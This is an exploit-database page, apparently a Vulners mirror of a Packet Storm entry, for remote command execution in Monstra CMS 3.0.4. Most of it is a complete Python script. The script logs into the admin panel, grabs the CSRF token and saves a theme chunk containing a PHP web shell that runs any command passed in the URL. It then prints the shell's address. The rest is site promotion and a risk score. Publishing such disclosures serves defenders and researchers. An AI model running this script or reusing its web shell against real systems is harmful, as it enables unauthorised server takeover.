Lucene search
K

Monstra CMS 3.0.4 Remote Command Execution

🗓️ 06 Mar 2025 00:00:00Reported by Ahmet Ümit BayramType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 257 Views

Monstra CMS 3.0.4 suffers from Remote Command Execution vulnerability when exploiting the admin panel.

Code
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution
    # Date: 05.03.2024
    # Exploit Author: Ahmet Ümit BAYRAM
    # Vendor Homepage: https://monstra.org/
    # Software Link: https://monstra.org/monstra-3.0.4.zip
    # Version: 3.0.4
    # Tested on: MacOS
    
    import requests
    import random
    import string
    import time
    import re
    import sys
    
    if len(sys.argv) < 4:
    print("Usage: python3 script.py <url> <username> <password>")
    sys.exit(1)
    
    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    session = requests.Session()
    
    login_url = f'{base_url}/admin/index.php?id=dashboard'
    login_data = {
    'login': username,
    'password': password,
    'login_submit': 'Log+In'
    }
    
    filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
    5))
    
    print("Logging in...")
    response = session.post(login_url, data=login_data)
    
    if 'Dashboard' in response.text:
    print("Login successful")
    else:
    print("Login failed")
    exit()
    
    time.sleep(3)
    
    edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
    response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
    erişim
    
    token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
    (.*?)"', response.text)
    if token_search:
    token = token_search.group(1)
    else:
    print("CSRF token could not be found.")
    exit()
    
    content = '''
    <html>
    <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset($_GET['cmd']))
    {
    system($_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    '''
    
    edit_data = {
    'csrf': token,
    'name': filename,
    'content': content,
    'add_file': 'Save'
    }
    
    print("Preparing shell...")
    response = session.post(edit_url, data=edit_data)
    time.sleep(3)
    
    if response.status_code == 200:
    print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
    .chunk.php")
    else:
    print("Failed to prepare shell.")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Mar 2025 00:00Current
7.7High risk
Vulners AI Score7.7
257